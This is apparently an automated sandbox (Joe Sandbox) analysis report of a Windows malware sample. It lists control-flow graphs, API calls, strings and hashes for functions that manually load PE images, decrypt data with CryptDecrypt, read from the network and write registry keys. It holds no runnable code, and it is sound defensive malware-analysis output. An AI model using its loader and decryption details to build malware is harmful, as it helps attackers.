38110->38126 38113 4114ad 38114 4114b7 38113->38114 38118 4114ce 38113->38118 38127 417a24 25 API calls 2 library calls 38114->38127 38116 411550 38116->38123 38128 40c339 14 API calls __dosmaperr 38116->38128 38117 4115a5 38117->38123 38130 40c339 14 API calls __dosmaperr 38117->38130 38118->38116 38118->38117 38121 411599 38129 40c25f 25 API calls _mbstowcs 38121->38129 38123->37925 38124->38109 38125->38123 38126->38113 38127->38123 38128->38121 38129->38123 38130->38123 38131->37938 38132->37938 38133->37938 38135 40eeb7 38134->38135 38136 40eec9 38134->38136 38162 409906 GetModuleHandleW 38135->38162 38146 40ed50 38136->38146 38139 40eebc 38139->38136 38163 40ef4f GetModuleHandleExW 38139->38163 38141 4096cf 38141->37386 38145 40ef0c 38147 40ed5c __FrameHandler3::FrameUnwindToState 38146->38147 38169 40f28c RtlEnterCriticalSection 38147->38169 38149 40ed66 38170 40edbc 38149->38170 38151 40ed73 38174 40ed91 38151->38174 38154 40ef0d 38179 41366f GetPEB 38154->38179 38157 40ef3c 38160 40ef4f __CreateFrameInfo 3 API calls 38157->38160 38158 40ef1c GetPEB 38158->38157 38159 40ef2c GetCurrentProcess TerminateProcess 38158->38159 38159->38157 38161 40ef44 ExitProcess 38160->38161 38162->38139 38164 40ef91 38163->38164 38165 40ef6e GetProcAddress 38163->38165 38167 40eec8 38164->38167 38168 40ef97 FreeLibrary 38164->38168 38166 40ef83 38165->38166 38166->38164 38167->38136 38168->38167 38169->38149 38171 40edc8 __FrameHandler3::FrameUnwindToState 38170->38171 38172 40ee29 __CreateFrameInfo 38171->38172 38177 410940 14 API calls __CreateFrameInfo 38171->38177 38172->38151 38178 40f2d4 RtlLeaveCriticalSection 38174->38178 38176 40ed7f 38176->38141 38176->38154 38177->38172 38178->38176 38180 413689 38179->38180 38182 40ef17 38179->38182 38183 411c94 5 API calls _unexpected 38180->38183 38182->38157 38182->38158 38183->38182 38184 9a1326 38185 9a1387 38184->38185 38191 9a132f 38184->38191 38186 9a13a1 RegOpenKeyA 38185->38186 38187 9a13c1 RegOpenKeyA 38185->38187 38186->38187 38188 9a13b7 38186->38188 38189 9a13de 38187->38189 38188->38187 38190 9a1422 GetNativeSystemInfo 38189->38190 38189->38191 38190->38191 38192 99f306 38193 9a172c LoadLibraryA 38192->38193 38195 9a3a03 38193->38195

                                                  Executed Functions

                                                  Function 00402C70 Relevance: 35.5, APIs: 11, Strings: 9, Instructions: 504COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 0 402c70-402c92 1 402c94-402cbb SetLastError call 402920 call 408ec2 0->1 2 402cbc-402cc4 0->2 3 402cf1-402cff 2->3 4 402cc6 2->4 8 402d01-402d28 SetLastError call 402920 call 408ec2 3->8 9 402d29-402d36 3->9 7 402ccb-402cf0 call 402920 SetLastError call 408ec2 4->7 11 402d38-402d3d 9->11 12 402d3f-402d48 9->12 11->7 16 402d54-402d5a 12->16 17 402d4a-402d4f 12->17 20 402d66-402d73 16->20 21 402d5c-402d61 16->21 17->7 24 402d94-402db7 GetNativeSystemInfo 20->24 25 402d75 20->25 21->7 29 402dc3-402ddb VirtualAlloc 24->29 30 402db9-402dbe 24->30 28 402d77-402d92 25->28 28->24 28->28 31 402e03-402e1e GetProcessHeap HeapAlloc 29->31 32 402ddd-402ded VirtualAlloc 29->32 30->7 33 402e20-402e2d VirtualFree 31->33 34 402e34-402e7a 31->34 32->31 35 402def-402dfc call 402920 32->35 33->34 36 402e7c-402e7e SetLastError 34->36 37 402e9e-402ee6 VirtualAlloc call 40a3e0 34->37 35->31 39 402e84-402e9d call 4033d0 call 408ec2 36->39 45 402eec-402eef 37->45 46 402f9f-402fa8 37->46 50 402ef0-402ef5 45->50 47 40302d 46->47 48 402fae-402fb5 46->48 56 403032-40303e call 402a80 47->56 53 402fb7-402fb9 48->53 54 402fbb-402fcd 48->54 51 402ef7-402f03 50->51 52 402f38-402f40 50->52 57 402f84-402f96 51->57 58 402f05-402f1f 51->58 52->36 60 402f46-402f59 call 402bf0 52->60 53->56 54->47 59 402fcf 54->59 56->39 65 403044-403067 56->65 57->50 62 402f9c 57->62 58->39 72 402f25-402f36 call 40aa10 58->72 64 402fd0-402fe5 59->64 69 402f5b-402f60 60->69 62->46 67 402fe7-402fea 64->67 68 40301e-403028 64->68 70 403069-40306e 65->70 71 40307c-40309c 65->71 73 402ff0-403001 67->73 68->64 75 40302a 68->75 69->39 74 402f66-402f7b call 40a3e0 69->74 76 403070-403073 70->76 77 403075-403077 70->77 79 4030a2-4030a8 71->79 80 403165-403171 call 402950 71->80 89 402f7e-402f81 72->89 81 403003-40300b 73->81 82 40300e-40301c 73->82 74->89 75->47 76->71 77->71 84 403079 77->84 86 4030b0-4030c9 79->86 92 403176-403178 80->92 81->82 82->68 82->73 84->71 90 4030e3-4030e6 86->90 91 4030cb-4030ce 86->91 89->57 96 403123-40312f 90->96 97 4030e8-4030ef 90->97 93 4030d0-4030d3 91->93 94 4030d5-4030d8 91->94 92->39 95 40317e-40318a 92->95 102 4030dd-4030e0 93->102 94->90 103 4030da 94->103 104 4031b3-4031b8 95->104 105 40318c-403195 95->105 100 403131 96->100 101 403137-403140 96->101 98 403120 97->98 99 4030f1-4030f6 call 402950 97->99 98->96 111 4030fb-4030fd 99->111 100->101 109 403143-40315f 101->109 102->90 103->102 107 40320a-403223 call 408ec2 104->107 108 4031ba-4031c3 104->108 105->104 110 403197-40319b 105->110 113 4031f4-403209 call 408ec2 108->113 114 4031c5-4031ce 108->114 109->80 109->86 110->104 115 40319d 110->115 111->39 117 403103-40311e 111->117 123 4031d0 114->123 124 4031da-4031f3 call 408ec2 114->124 116 4031a0-4031af 115->116 125 4031b1 116->125 117->109 123->124 125->104
                                                  APIs
                                                  • SetLastError.KERNEL32(0000000D), ref: 00402C96
                                                  • SetLastError.KERNEL32(000000C1), ref: 00402CD8
                                                  Strings
                                                  • DOS header is not valid!, xrefs: 00402CC6
                                                  • @, xrefs: 00402C8F
                                                  • FileHeader.Machine != HOST_MACHINE!, xrefs: 00402D4A
                                                  • alignedImageSize != AlignValueUp!, xrefs: 00402DB9
                                                  • DOS header size is not valid!, xrefs: 00402D09
                                                  • ERROR_OUTOFMEMORY!, xrefs: 00402DEF
                                                  • Section alignment invalid!, xrefs: 00402D5C
                                                  • Signature != IMAGE_NT_SIGNATURE!, xrefs: 00402D38
                                                  • Size is not valid!, xrefs: 00402C9C
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2597509559.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2597509559.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_zSmMqGGeVy.jbxd
                                                  Similarity
                                                  • API ID: ErrorLast
                                                  • String ID: @$DOS header is not valid!$DOS header size is not valid!$ERROR_OUTOFMEMORY!$FileHeader.Machine != HOST_MACHINE!$Section alignment invalid!$Signature != IMAGE_NT_SIGNATURE!$Size is not valid!$alignedImageSize != AlignValueUp!
                                                  • API String ID: 1452528299-393758929
                                                  • Opcode ID: a7ee295ea28172196232d939963434d58e5a2b4f3baf6ecdb48b764af0884dbc
                                                  • Instruction ID: 68209fb506ae9b68e90255ee0055c9910cae7d9580854ddc7816d62818b51dcc
                                                  • Opcode Fuzzy Hash: a7ee295ea28172196232d939963434d58e5a2b4f3baf6ecdb48b764af0884dbc
                                                  • Instruction Fuzzy Hash: 3E129C71B002159BDB14CF98D985BAEBBB5BF48304F14416AE809BB3C1D7B8ED41CB98
                                                  Function 004034C0 Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 225encryptionCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 855 4034c0-403548 CryptAcquireContextW 856 40360a-403620 GetLastError CryptReleaseContext 855->856 857 40354e-40356c CryptCreateHash 855->857 858 403754-40375a 856->858 857->856 859 403572-403585 857->859 860 403784-4037a1 call 408ec2 858->860 861 40375c-403768 858->861 862 403588-40358d 859->862 863 40377a-403781 call 409027 861->863 864 40376a-403778 861->864 862->862 865 40358f-4035d6 call 409035 call 40e46b CryptHashData 862->865 863->860 864->863 867 4037a2-4037b5 call 40c26f 864->867 879 4035e6-403608 CryptDeriveKey 865->879 880 4035d8-4035e1 GetLastError 865->880 877 4037b7-4037be 867->877 878 4037c8 867->878 877->878 884 4037c0-4037c4 877->884 879->856 881 403625-403626 call 40e2bd 879->881 880->858 885 40362b-403677 call 40a3e0 call 409035 881->885 884->878 890 403748-40374e CryptDestroyKey 885->890 891 40367d-40368c 885->891 890->858 892 403692-40369b 891->892 893 4036a9-4036e4 call 40a3e0 CryptDecrypt 892->893 894 40369d-40369f 892->894 893->890 897 4036e6-403711 call 40a3e0 893->897 894->893 897->890 900 403713-403742 897->900 900->890 900->892
                                                  APIs
                                                  • CryptAcquireContextW.ADVAPI32(?,00000000,?,00000018,F0000000,400415DF), ref: 00403540
                                                  • CryptCreateHash.ADVAPI32(?,0000800C,00000000,00000000,?), ref: 00403564
                                                  • _mbstowcs.LIBCMT ref: 004035B7
                                                  • CryptHashData.ADVAPI32(?,00000000,?,00000000), ref: 004035CE
                                                  • GetLastError.KERNEL32 ref: 004035D8
                                                  • CryptDeriveKey.ADVAPI32(?,0000660E,?,00000000,?), ref: 00403600
                                                  • GetLastError.KERNEL32 ref: 0040360A
                                                  • CryptReleaseContext.ADVAPI32(?,00000000), ref: 0040361A
                                                  • CryptDecrypt.ADVAPI32(?,00000000,00000000,00000000,?,00000000), ref: 004036DC
                                                  • CryptDestroyKey.ADVAPI32(?), ref: 0040374E
                                                  Strings
                                                  • Microsoft Enhanced RSA and AES Cryptographic Provider, xrefs: 0040351C
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2597509559.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2597509559.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_zSmMqGGeVy.jbxd
                                                  Similarity
                                                  • API ID: Crypt$ContextErrorHashLast$AcquireCreateDataDecryptDeriveDestroyRelease_mbstowcs
                                                  • String ID: Microsoft Enhanced RSA and AES Cryptographic Provider
                                                  • API String ID: 3642901890-63410773
                                                  • Opcode ID: b9aca645bf8e0e24d310163d35795d59eee685dab11f25e4e54b3c0023d62c89
                                                  • Instruction ID: 057eae88fc1e8b42dc2b0b13f8460ebd140b44a30a8541124d595f3772e2d34e
                                                  • Opcode Fuzzy Hash: b9aca645bf8e0e24d310163d35795d59eee685dab11f25e4e54b3c0023d62c89
                                                  • Instruction Fuzzy Hash: 4D8182B1A00218AFEF248F25CC45B9ABBB9EF45304F1081BAE50DE7291DB359E858F55
                                                  Function 00402950 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 113memorywindowCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 921 402950-402967 922 4029a9-4029bd call 408ec2 921->922 923 402969-402972 921->923 924 402974-402979 923->924 925 4029be-402a00 VirtualProtect 923->925 924->922 928 40297b-402980 924->928 925->922 927 402a02-402a24 GetLastError FormatMessageA 925->927 930 402a27-402a2c 927->930 931 402982-40298a 928->931 932 402996-4029a3 call 402c10 928->932 930->930 933 402a2e-402a7a LocalAlloc call 4028e0 OutputDebugStringA LocalFree * 2 call 408ec2 930->933 931->932 934 40298c-402994 931->934 937 4029a5 932->937 934->932 936 4029a8 934->936 936->922 937->936
                                                  APIs
                                                  • VirtualProtect.KERNEL32(?,?,?,?), ref: 004029F8
                                                  • GetLastError.KERNEL32(00000400,?,00000000,00000000,?,?,?,?), ref: 00402A0D
                                                  • FormatMessageA.KERNEL32(00001300,00000000,00000000,?,?,?,?), ref: 00402A1B
                                                  • LocalAlloc.KERNEL32(00000040,?,?,?,?,?), ref: 00402A36
                                                  • OutputDebugStringA.KERNEL32(00000000,?,?), ref: 00402A55
                                                  • LocalFree.KERNEL32(00000000), ref: 00402A62
                                                  • LocalFree.KERNEL32(?), ref: 00402A67
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2597509559.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2597509559.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_zSmMqGGeVy.jbxd
                                                  Similarity
                                                  • API ID: Local$Free$AllocDebugErrorFormatLastMessageOutputProtectStringVirtual
                                                  • String ID: %s: %s$Error protecting memory page
                                                  • API String ID: 839691724-1484484497
                                                  • Opcode ID: 2c46ffc98d029cfadbc5bd6c783c679e7e34e813f473582b7efecdd829900f05
                                                  • Instruction ID: 2da31f80489fd9465a3e1d2b594a5759e7c0520832ca97f04c55df17c8a78757
                                                  • Opcode Fuzzy Hash: 2c46ffc98d029cfadbc5bd6c783c679e7e34e813f473582b7efecdd829900f05
                                                  • Instruction Fuzzy Hash: 0831F272B00114AFDB14DF58DC44FAAB7A8FF48304F0541AAE905EB291DA75AD12CA88
                                                  Function 00401880 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 298networkfileCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1026 401880-401943 InternetSetFilePointer InternetReadFile 1028 40197d-4019c0 call 40aa10 HttpQueryInfoA 1026->1028 1032 401d25-401d53 call 408ec2 1028->1032 1033 4019c6-4019f9 CoCreateInstance 1028->1033 1033->1032 1035 4019ff-401a06 1033->1035 1035->1032 1037 401a0c-401a3a 1035->1037 1038 401a40-401a45 1037->1038 1038->1038 1039 401a47-401b08 call 402470 MultiByteToWideChar call 409035 MultiByteToWideChar 1038->1039 1044 401b10-401b19 1039->1044 1044->1044 1045 401b1b-401bd9 call 402310 call 408ed0 1044->1045 1052 401c0a-401c0c 1045->1052 1053 401bdb-401bea 1045->1053 1056 401c12-401c19 1052->1056 1057 401d19-401d20 1052->1057 1054 401c00-401c07 call 409027 1053->1054 1055 401bec-401bfa 1053->1055 1054->1052 1055->1054 1058 401d56-401d5b call 40c26f 1055->1058 1056->1057 1060 401c1f-401c93 call 409035 1056->1060 1057->1032 1067 401c95-401ca3 1060->1067 1068 401cff-401d15 call 408ed0 1060->1068 1069 401ca5-401cdb call 409035 call 4014b0 call 408ed0 1067->1069 1070 401cdd 1067->1070 1068->1057 1074 401ce0-401cfc call 4014b0 1069->1074 1070->1074 1074->1068
                                                  APIs
                                                  • InternetSetFilePointer.WININET(?,00000000,00000000,00000000,00000000), ref: 00401905
                                                  • InternetReadFile.WININET(?,00000000,000003E8,00000000), ref: 00401924
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2597509559.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2597509559.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_zSmMqGGeVy.jbxd
                                                  Similarity
                                                  • API ID: FileInternet$PointerRead
                                                  • String ID: text
                                                  • API String ID: 3197321146-999008199
                                                  • Opcode ID: 87aac4e3b5ff56ab0de5e0ee71ca196cf257f89e2ae9c22cdb46c2756a6c72d5
                                                  • Instruction ID: 86dcce6fdabdf1d76a3839b2d4c7acaf7fb3a9f1032210a7d38a4a94718e3fd4
                                                  • Opcode Fuzzy Hash: 87aac4e3b5ff56ab0de5e0ee71ca196cf257f89e2ae9c22cdb46c2756a6c72d5
                                                  • Instruction Fuzzy Hash: 7AC16B71A002189FEB25CF24CD85BEAB7B9FF48304F1041ADE509A76A1DB75AE84CF54
                                                  Function 0040EF0D Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • GetCurrentProcess.KERNEL32(?,?,0040EF0C,00000000,771ADF80,?,00000000,?,004114AD), ref: 0040EF2F
                                                  • TerminateProcess.KERNEL32(00000000,?,0040EF0C,00000000,771ADF80,?,00000000,?,004114AD), ref: 0040EF36
                                                  • ExitProcess.KERNEL32 ref: 0040EF48
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2597509559.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2597509559.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_zSmMqGGeVy.jbxd
                                                  Similarity
                                                  • API ID: Process$CurrentExitTerminate
                                                  • String ID:
                                                  • API String ID: 1703294689-0
                                                  • Opcode ID: 0681eec8a10bae1972cdd76b7596642c5d6b23a8fea5b51096d6af8d336d3898
                                                  • Instruction ID: d9b2d8b9480fbdfc0f40d30fbcce2ac7d268d3ffe56ae59340c1a79faed9bf6b
                                                  • Opcode Fuzzy Hash: 0681eec8a10bae1972cdd76b7596642c5d6b23a8fea5b51096d6af8d336d3898
                                                  • Instruction Fuzzy Hash: 48E08C71400108BFCF117F26CC0898A3F28FB10341B004835F804AA232CB39DD92CB58
                                                  Function 00DAA45E Relevance: 3.0, APIs: 2, Instructions: 41processCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00DAA486
                                                  • Module32First.KERNEL32(00000000,00000224), ref: 00DAA4A6
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2598451673.0000000000DA9000.00000040.00000020.00020000.00000000.sdmp, Offset: 00DA9000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_da9000_zSmMqGGeVy.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CreateFirstModule32SnapshotToolhelp32
                                                  • String ID:
                                                  • API String ID: 3833638111-0
                                                  • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                  • Instruction ID: 6074004713fa8cedcd78a2c4db1c3535bee64b462bb66ea8d3b82e5fa0bbeede
                                                  • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                  • Instruction Fuzzy Hash: FCF0C2311007106BD7202ABCA88DA6E72E8AF4E324F140629F646914C0CBF4EC05CA72
                                                  Function 00408020 Relevance: 2.5, Strings: 2, Instructions: 27COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2597509559.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2597509559.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_zSmMqGGeVy.jbxd
                                                  Similarity
                                                  • API ID: Sleep
                                                  • String ID: emp$mixtwo
                                                  • API String ID: 3472027048-2390925073
                                                  • Opcode ID: 7c8f0e1ea6e5323602f9bb77927d34118e87d89025315e812fc220ab57e9b21a
                                                  • Instruction ID: 72a2dd17e89226f8ccca0b0bb08db3f26db736a0bfe45ababc36bb360cb4900e
                                                  • Opcode Fuzzy Hash: 7c8f0e1ea6e5323602f9bb77927d34118e87d89025315e812fc220ab57e9b21a
                                                  • Instruction Fuzzy Hash: 7BF08CB160130457E710BF24ED1B71A3EA4970275CFA006ADDC601F2D2E7FB821A97EA
                                                  Function 004055C0 Relevance: 27.3, APIs: 5, Strings: 10, Instructions: 1092sleepCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 129 4055c0-405667 call 40f20b call 40f042 Sleep call 402470 call 4038c0 138 405691-4056d2 call 402470 call 4038c0 129->138 139 405669-405675 129->139 152 405701-40570b 138->152 153 4056d4-4056e0 138->153 140 405687-40568e call 409027 139->140 141 405677-405685 139->141 140->138 141->140 143 4056f2 call 40c26f 141->143 149 4056f7-4056fe call 409027 143->149 149->152 156 405718-40571e 152->156 157 40570d-405716 152->157 153->149 154 4056e2-4056f0 153->154 154->143 154->149 158 405721-405723 156->158 157->158 159 405725-40572d 158->159 160 40574d-40576c call 408690 158->160 162 405730-405748 call 40f158 159->162 165 405a91-405ad8 call 408470 * 3 call 4064d0 call 408190 call 4022d0 call 408260 call 402200 160->165 166 405772-40580b call 40aa10 call 409035 call 40aa10 160->166 170 40574a 162->170 215 405bab-405bd6 call 406770 call 408150 call 4022d0 call 408260 call 402200 165->215 216 405ade-405aef call 4021b0 165->216 181 40580d-405821 call 409170 166->181 182 40584f-405856 166->182 170->160 181->182 192 405823-40584c call 409482 call 409126 181->192 184 405882-4058a0 182->184 185 405858-40587d 182->185 188 4058a3-4058a8 184->188 185->184 188->188 191 4058aa-405922 call 402470 call 408a60 188->191 207 405951-405969 191->207 208 405924-405930 191->208 192->182 209 405970-40598d 207->209 211 405932-405940 208->211 212 405947-40594e call 409027 208->212 213 4059a2-4059b0 call 401d60 209->213 214 40598f-405998 call 408ed0 209->214 211->212 217 405942 call 40c26f 211->217 212->207 231 405a45-405a4c Sleep 213->231 232 4059b6-4059dc 213->232 214->213 271 405caa-405cd5 call 406b10 call 408150 call 4022d0 call 408260 call 402200 215->271 272 405bdc-405c53 call 4067f0 call 408150 call 4022d0 call 402250 call 402200 call 406870 call 408170 call 4022d0 call 402250 call 402200 call 4068f0 call 4081b0 call 4022d0 call 408260 call 402200 215->272 229 405af1-405b49 call 406550 call 4081b0 call 4022d0 call 402250 call 402200 call 4065e0 call 408170 call 4022d0 call 402250 call 402200 call 408440 216->229 230 405b4e-405ba6 call 406660 call 4081b0 call 4022d0 call 402250 call 402200 call 4066f0 call 408170 call 4022d0 call 402250 call 402200 call 408440 216->230 217->212 347 406123-40627a call 4016b0 call 407c30 call 4081b0 call 4022d0 call 407bb0 call 408190 call 4022d0 call 407b10 call 4081e0 call 4022d0 call 408560 call 4085c0 call 408670 call 4085c0 call 408670 call 4085c0 call 402200 * 8 229->347 230->347 231->209 236 4059e0-4059e5 232->236 236->236 240 4059e7-405a0c call 402470 236->240 252 405a51-405a56 240->252 253 405a0e-405a11 240->253 256 405a58-405a5a 252->256 257 405a5c-405a5e 252->257 259 405a13-405a1a 253->259 260 405a6a-405a8c call 408440 call 402200 * 2 call 401710 253->260 265 405a61-405a63 256->265 257->265 259->231 262 405a1c-405a25 259->262 260->165 269 405a27-405a35 262->269 270 405a3b-405a42 call 409027 262->270 265->260 274 405a65 call 4037d0 265->274 269->143 269->270 270->231 324 405d99-405dc4 call 406eb0 call 408130 call 4022d0 call 408260 call 402200 271->324 325 405cdb-405d52 call 406b90 call 408150 call 4022d0 call 402250 call 402200 call 406c10 call 408170 call 4022d0 call 402250 call 402200 call 406c90 call 4081b0 call 4022d0 call 408260 call 402200 271->325 417 405c72-405c9d call 406a00 call 4081b0 call 4022d0 call 408260 call 402200 272->417 418 405c55 call 406980 272->418 274->260 374 405dca-405e67 call 406f30 call 408190 call 4022d0 call 402250 call 402200 call 406fb0 call 408170 call 4022d0 call 402250 call 402200 call 407030 call 408130 call 4022d0 call 402250 call 402200 call 4070b0 call 408230 call 4022d0 call 408260 call 402200 324->374 375 405eae-405ed9 call 4072d0 call 408100 call 4022d0 call 408260 call 402200 324->375 497 405d54-405d59 call 406d20 325->497 498 405d5e-405d89 call 406da0 call 4081b0 call 4022d0 call 408260 call 402200 325->498 634 406280-406299 call 4021f0 call 402070 347->634 625 405e73-405e9e call 4071c0 call 408230 call 4022d0 call 408260 call 402200 374->625 626 405e69-405e6e call 407140 374->626 430 405f59-405f84 call 4074f0 call 4081b0 call 4022d0 call 408260 call 402200 375->430 431 405edb-405f54 call 407360 call 408170 call 4022d0 call 402250 call 402200 call 4073e0 call 4081b0 call 4022d0 call 402250 call 402200 call 407470 call 408130 call 4022d0 call 402250 call 402200 375->431 417->347 493 405ca3-405ca8 call 406a90 417->493 429 405c5a-405c6d call 408190 call 4022d0 418->429 464 406115-40611e call 402250 call 402200 429->464 511 406004-40602f call 407700 call 408200 call 4022d0 call 408260 call 402200 430->511 512 405f86-405fff call 407580 call 408170 call 4022d0 call 402250 call 402200 call 407600 call 408190 call 4022d0 call 402250 call 402200 call 407680 call 408130 call 4022d0 call 402250 call 402200 430->512 431->347 464->347 493->429 497->429 498->347 566 405d8f-405d94 call 406e30 498->566 575 406031-406082 call 407790 call 408170 call 4022d0 call 402250 call 402200 call 407810 call 408130 call 4022d0 call 402250 call 402200 call 407890 511->575 576 406084-4060af call 407910 call 408130 call 4022d0 call 408260 call 402200 511->576 512->347 566->324 704 406102-406112 call 408130 call 4022d0 575->704 576->347 644 4060b1-4060fd call 407990 call 408170 call 4022d0 call 402250 call 402200 call 407a10 call 408190 call 4022d0 call 402250 call 402200 call 407a90 576->644 625->347 685 405ea4-405ea9 call 407250 625->685 626->625 660 4062d9-4062e0 Sleep 634->660 661 40629b-4062be call 4020b0 call 4022d0 call 4025c0 634->661 644->704 660->634 693 4062c0-4062cf call 4025c0 661->693 694 4062e2-406341 call 402200 call 408490 * 3 call 404ac0 661->694 685->375 693->694 707 4062d1-4062d4 call 402200 693->707 727 406343-406352 call 408490 call 403940 694->727 728 40635a-406385 call 407cc0 call 408200 call 4022d0 call 408260 call 402200 694->728 704->464 707->660 736 406357 727->736 744 406420-406451 call 407e30 call 4081b0 call 4022d0 call 408260 call 402200 728->744 745 40638b-4063bb call 4016b0 call 407d50 call 4080b0 call 4022d0 728->745 736->728 767 406453-4064b8 call 407fa0 call 408190 call 4022d0 call 407f20 call 408190 call 4022d0 call 407ec0 call 408090 call 4022d0 call 405460 744->767 768 4064bb-4064c0 call 4037d0 744->768 763 4063c0-4063d6 call 4021f0 call 402070 745->763 775 4063e7-406404 call 4020b0 call 4022d0 call 402200 763->775 776 4063d8-4063e3 Sleep 763->776 767->768 782 406409-40641b call 402200 call 401710 775->782 776->763 778 4063e5 776->778 778->782 782->744
                                                  APIs
                                                  • Sleep.KERNEL32(000005DC,?,7732D120), ref: 00405620
                                                  • __Init_thread_footer.LIBCMT ref: 00405847
                                                  • Sleep.KERNEL32(00000BB8,00000000,?,0042B77C,0042B92C,0042B92D,?,?,?,?,?,?,?,00000001,SUB=,00000004), ref: 00405A4A
                                                    • Part of subcall function 00406550: __Init_thread_footer.LIBCMT ref: 004065B9
                                                    • Part of subcall function 004065E0: __Init_thread_footer.LIBCMT ref: 0040663A
                                                    • Part of subcall function 00407C30: __Init_thread_footer.LIBCMT ref: 00407C99
                                                    • Part of subcall function 00407BB0: __Init_thread_footer.LIBCMT ref: 00407C09
                                                    • Part of subcall function 00407B10: __Init_thread_footer.LIBCMT ref: 00407B8D
                                                  • Sleep.KERNEL32(00000BB8,00000000,?,?,?,?,?,004272E8,00000000,00000000,?,00000000,00000001,SUB=,00000004), ref: 004062DE
                                                  • Sleep.KERNEL32(00000BB8,00000000,00000000,004272E8), ref: 004063DD
                                                    • Part of subcall function 00407FA0: __Init_thread_footer.LIBCMT ref: 00407FF9
                                                    • Part of subcall function 00407F20: __Init_thread_footer.LIBCMT ref: 00407F79
                                                    • Part of subcall function 00407EC0: __Init_thread_footer.LIBCMT ref: 00407F11
                                                    • Part of subcall function 004055C0: RegCreateKeyExA.ADVAPI32(80000001,?,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00405493
                                                    • Part of subcall function 004055C0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020006,?), ref: 004054B5
                                                    • Part of subcall function 004055C0: RegSetValueExA.ADVAPI32(?,?,00000000,00000001,?), ref: 004054DD
                                                    • Part of subcall function 004055C0: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004054E6
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2597509559.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2597509559.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_zSmMqGGeVy.jbxd
                                                  Similarity
                                                  • API ID: Init_thread_footer$Sleep$CloseCreateOpenValue
                                                  • String ID: DFEK$KDOX$Q)9$SUB=$]DFE$^OX*$get$mixone$updateSW$viFO
                                                  • API String ID: 2078494684-1136066708
                                                  • Opcode ID: 3370340bea71cbf09f401ea1be89ae1aa616e8b686eb8a3d9626f30ac681365a
                                                  • Instruction ID: f649a411d8851b1a91c0a488fce11130e3673d7bad0c40fe0d5f826dd2b8960c
                                                  • Opcode Fuzzy Hash: 3370340bea71cbf09f401ea1be89ae1aa616e8b686eb8a3d9626f30ac681365a
                                                  • Instruction Fuzzy Hash: 3F82AF71D001049ADB14FBB5C95ABEEB3789F14308F5081BEF412771D2EF786A49CAA9
                                                  Function 10001523 Relevance: 21.2, APIs: 10, Strings: 2, Instructions: 192networkCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  APIs
                                                  • __EH_prolog3_GS.LIBCMT ref: 1000152A
                                                  • __cftof.LIBCMT ref: 10001624
                                                  • InternetOpenA.WININET(?,?,?,00000000,00000000), ref: 1000163D
